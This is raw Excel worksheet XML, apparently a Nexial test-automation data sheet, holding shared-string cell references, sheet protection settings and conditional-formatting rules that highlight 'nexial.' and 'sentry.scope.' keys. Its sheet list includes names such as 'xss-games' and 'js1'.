  <dimension ref="A1:AAA50"/>
  <sheetViews>
    <sheetView zoomScale="112" zoomScalePageLayoutView="125" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="17"/>
  <cols>
    <col min="1" max="1" width="25.33203125" style="1" bestFit="1" customWidth="1" collapsed="1"/>
    <col min="2" max="2" width="96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9</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>69</v>
      </c>
      <c r="HA1" s="6"/>
      <c r="AAA1" s="6"/>
    </row>
    <row r="2" spans="1:703" ht="24" customHeight="1">
      <c r="A2" s="1" t="s">
        <v>95</v>
      </c>
      <c r="B2" s="8" t="s">
        <v>96</v>
      </c>
      <c r="HA2" s="6"/>
      <c r="AAA2" s="6"/>
    </row>
    <row r="3" spans="1:703" ht="24" customHeight="1">
      <c r="A3" s="1" t="s">
        <v>81</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>98</v>
      </c>
      <c r="HA3" s="4"/>
      <c r="AAA3" s="5"/>
    </row>
    <row r="4" spans="1:703" ht="24" customHeight="1">
      <c r="A4" s="1" t="s">
        <v>82</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>85</v>
      </c>
      <c r="HA4" s="4"/>
      <c r="AAA4" s="5"/>
    </row>
    <row r="5" spans="1:703" ht="24" customHeight="1">
      <c r="A5" s="1" t="s">
        <v>87</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>101</v>
      </c>
      <c r="HA5" s="4"/>
      <c r="AAA5" s="5"/>
    </row>
    <row r="6" spans="1:703" ht="24" customHeight="1">
      <c r="A6" s="1" t="s">
        <v>83</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>102</v>
      </c>
      <c r="HA6" s="4"/>
      <c r="AAA6" s="5"/>
    </row>
    <row r="7" spans="1:703" ht="24" customHeight="1">
      <c r="A7" s="1" t="s">
        <v>89</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="8" spans="1:703" ht="24" customHeight="1">
      <c r="A8" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>97</v>
      </c>
    </row>
    <row r="9" spans="1:703" ht="24" customHeight="1">
      <c r="A9" s="1" t="s">
        <v>99</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>100</v>
      </c>
    </row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</sheetData>
  <sheetProtection formatColumns="0" formatRows="0" insertColumns="0" insertRows="0" deleteColumns="0" deleteRows="0"/>
  <conditionalFormatting sqref="A23:A1048576 A3:A18">
    <cfRule type="beginsWith" dxfId="14" priority="13" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A3,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="13" priority="14" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A3,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="12" priority="15" stopIfTrue="1">
      <formula>LEN(TRIM(A3))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B3:B18 B23:B1048576">
    <cfRule type="expression" dxfId="11" priority="16" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="10" priority="17">
      <formula>LEN(TRIM(B3))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A19:A22">
    <cfRule type="beginsWith" dxfId="9" priority="6" stopIfTrue="1" operator="beginsWith" text="nexial.scope.">
      <formula>LEFT(A19,LEN("nexial.scope."))="nexial.scope."</formula>
    </cfRule>
    <cfRule type="beginsWith" dxfId="8" priority="7" stopIfTrue="1" operator="beginsWith" text="nexial.">
      <formula>LEFT(A19,LEN("nexial."))="nexial."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="7" priority="8" stopIfTrue="1">
      <formula>LEN(TRIM(A19))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B19:B22">
    <cfRule type="expression" dxfId="6" priority="9" stopIfTrue="1">
      <formula>LEFT(OFFSET(INDIRECT(ADDRESS(ROW(),COLUMN())),0,-1), 13) = "sentry.scope."</formula>
    </cfRule>
    <cfRule type="notContainsBlanks" dxfId="5" priority="10">
      <formula>LEN(TRIM(B19))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A1:A2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xss-games</vt:lpstr>
      <vt:lpstr>js1</vt:lpstr>
      <vt:lpstr>js2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2019-11-13T16:20:45Z</dcterms:modified>
</cp:coreProperties>
</file>